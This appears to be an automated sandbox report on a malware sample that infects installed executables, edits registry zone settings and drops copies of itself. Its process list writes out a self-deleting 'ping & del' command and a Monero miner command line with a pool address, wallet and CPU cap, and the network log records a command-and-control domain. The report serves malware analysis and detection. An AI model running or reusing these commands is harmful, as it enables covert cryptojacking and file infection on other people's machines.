File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\codecpacks.VP9.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroLayoutRecognizer\AcroLayoutRecognizer.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javapackager.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\javaws.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\msoev.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\java-rmi.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxIdentityProvider_12.50.6001.0_x64__8wekyb3d8bbwe\XboxIdp.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\dotnet\dotnet.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\servertool.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\unpack200.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jabswitch.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jabswitch.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jhat.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\CLVIEW.EXE C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\CLVIEW.EXE C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\jjs.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\java-rmi.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\schemagen.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\WindowsCamera.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jjs.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\chrmstp.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PPTICO.EXE C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Source Engine\OSE.EXE C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jhat.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\XboxApp.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\XLICONS.EXE C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\pack200.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javap.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxSpeechToTextOverlay_1.17.29001.0_x64__8wekyb3d8bbwe\SpeechToTextOverlay64-Retail.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\klist.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\jp2launcher.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\filecompare.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\7-Zip\7zFM.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Client\AppVDllSurrogate64.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\pingsender.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_x64__8wekyb3d8bbwe\Microsoft.Notes.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\ktab.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jinfo.exe C:\Windows\TEMP\aEHvt.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\TEMP\aEHvt.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\TEMP\aEHvt.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\TEMP\aEHvt.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\TEMP\aEHvt.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\TEMP\aEHvt.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\Microsoft\National\Nationa.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3436 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe
PID 3436 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe
PID 3436 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe
PID 4044 wrote to memory of 3296 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 4044 wrote to memory of 3296 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 4044 wrote to memory of 3296 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 3436 wrote to memory of 3884 N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 3436 wrote to memory of 3884 N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 3436 wrote to memory of 3884 N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 3884 wrote to memory of 3464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3884 wrote to memory of 3464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3884 wrote to memory of 3464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4044 wrote to memory of 4980 N/A C:\ProgramData\National\National.exe C:\ProgramData\Microsoft\National\Nationa.exe
PID 4044 wrote to memory of 4980 N/A C:\ProgramData\National\National.exe C:\ProgramData\Microsoft\National\Nationa.exe
PID 3296 wrote to memory of 844 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 3296 wrote to memory of 844 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 3296 wrote to memory of 844 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 1256 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 1256 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 1256 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\aEHvt.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\aEHvt.exe

C:\Users\Admin\AppData\Local\Temp\aEHvt.exe

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c @ping -n 5 127.0.0.1&del C:\Users\Admin\AppData\Local\Temp\564651~1.EXE > nul

C:\Windows\SysWOW64\PING.EXE

ping -n 5 127.0.0.1

C:\ProgramData\Microsoft\National\Nationa.exe

C:\ProgramData\Microsoft\National\Nationa.exe -o stratum+tcp://xmr.crypto-pool.fr:80 -u 48ihXYmNKMUCdz7C5e5KB47FWxf9W6ruEYbhXHZ8qVff71WJ8TAZWCdM1rLUBpVWBdEzTYJbNt4URDm9M6mdbrvoToBSJA9 -p x -k --max-cpu-usage=80

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Windows\TEMP\2d0470f9.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2d0470f9.bat" "

Network

Country Destination Domain Proto
US 8.8.8.8:53 ddos.dnsnb8.net udp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 105.84.221.44.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 17.173.189.20.in-addr.arpa udp

Files

memory/3436-0-0x0000000000670000-0x0000000000795000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\aEHvt.exe

MD5 56b2c3810dba2e939a8bb9fa36d3cf96
SHA1 99ee31cd4b0d6a4b62779da36e0eeecdd80589fc
SHA256 4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07
SHA512 27812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e

memory/1256-5-0x00000000002C0000-0x00000000002C9000-memory.dmp

C:\ProgramData\National\National.exe

MD5 5646516f9069627c54a3878c3af85286
SHA1 ae5b07a58f1e1d148d76b4241dfedddab6def8cc
SHA256 ff4e9b01d2553acf16d757f2877f29710872de0c468d3eccded2a00decb7b8d9
SHA512 d0942c255d0f0b525d83c2ac903f0f078667bfb71bd6524d1859892598e11c1ed673e694bf07e4bbcae31e1910f30be4d15213e67005fb36e5a9fcf92a6a36cf

memory/3296-14-0x0000000000850000-0x0000000000859000-memory.dmp

memory/4044-13-0x0000000000600000-0x0000000000725000-memory.dmp

C:\Program Files\7-Zip\Uninstall.exe

MD5 aaf69cfb9033627f1c108749c1c307a5
SHA1 d83d98268ee10ae8713cd1954a7c96a77ee4f188
SHA256 c1205c5d86b4e805a01751dec4004f2316eba90fee0967f3760525fbd1ac7cb3
SHA512 e93ba29d88999459e29d90e1552ccd82152e7164bff1cb068edc8bb27fcdc5f257ebac7dc84f176d93ae36b507f07e54f540b329b2334c5ae7507e4758e2660f

memory/3436-17-0x0000000000670000-0x0000000000795000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\k1[1].rar

MD5 d3b07384d113edec49eaa6238ad5ff00
SHA1 f1d2d2f924e986ac86fdf7b36c94bcdf32beec15
SHA256 b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c
SHA512 0cf9180a764aba863a67b6d72f0918bc131c6772642cb2dce5a34f0a702f9470ddc2bf125c12198b1995c233c34b4afd346c54a2334c350a948a51b6e8b4e6b6

C:\Windows\Temp\5EA418CE.exe

MD5 20879c987e2f9a916e578386d499f629
SHA1 c7b33ddcc42361fdb847036fc07e880b81935d5d
SHA256 9f2981a7cc4d40a2a409dc895de64253acd819d7c0011c8e80b86fe899464e31
SHA512 bcdde1625364dd6dd143b45bdcec8d59cf8982aff33790d390b839f3869e0e815684568b14b555a596d616252aeeaa98dac2e6e551c9095ea11a575ff25ff84f

C:\ProgramData\Microsoft\National\Nationa.exe

MD5 3fe786058a5e426c151ac71566f504ae
SHA1 76a8fe2f276a8fe174559fe24250093adb8619db
SHA256 77255adc0910dc376f87f4db05849dc8a20c9e87ab181cf2ff513fc718c869bd
SHA512 5e387b659c007ac8179375c9b2ce35b8413100394ebb3773962a33e1ac9de228b128d713417aa1138b3cbef5f3a5b79a6b11f888495519bbe46bddac78ed1a7c

memory/3296-100-0x0000000000850000-0x0000000000859000-memory.dmp

memory/1256-103-0x00000000002C0000-0x00000000002C9000-memory.dmp

C:\Windows\TEMP\2d0470f9.bat

MD5 a64c50da2c84ee68f634a86ce8e65a37
SHA1 a41d79d5174df26ddede9a9bcd0d5d631d037849
SHA256 646963ad5c04da91513d63c1ed1638c7a09652101f3e251c74627155b59aaa9e
SHA512 f35044e38117c94ba597e2870ae1c3c8817aabf17e1ad8fe72364ab599a56418b4820f7b2f0b158d164fc02359b11a45ba719b45f7e5d2292bda7d11d92a8502

C:\Users\Admin\AppData\Local\Temp\2d0470f9.bat

MD5 1a1729b9c78ba685dd834728d5d383c0
SHA1 17f23ae8e3f8eac35ee7d5816e65b9635fe9c687
SHA256 7c61ece1721a691ecc98619b3562e283b2e531a32403d8533c1ede96a1a97c3a
SHA512 d2ae5a564c1da880a1aea5bc0d5c2143d32b71cff9cce0e32669dd5a1b372c663565baaabe605956419eb1f8d7f776b8ad302d0f671309c279fdf1f2d81a205f

memory/4044-106-0x0000000000600000-0x0000000000725000-memory.dmp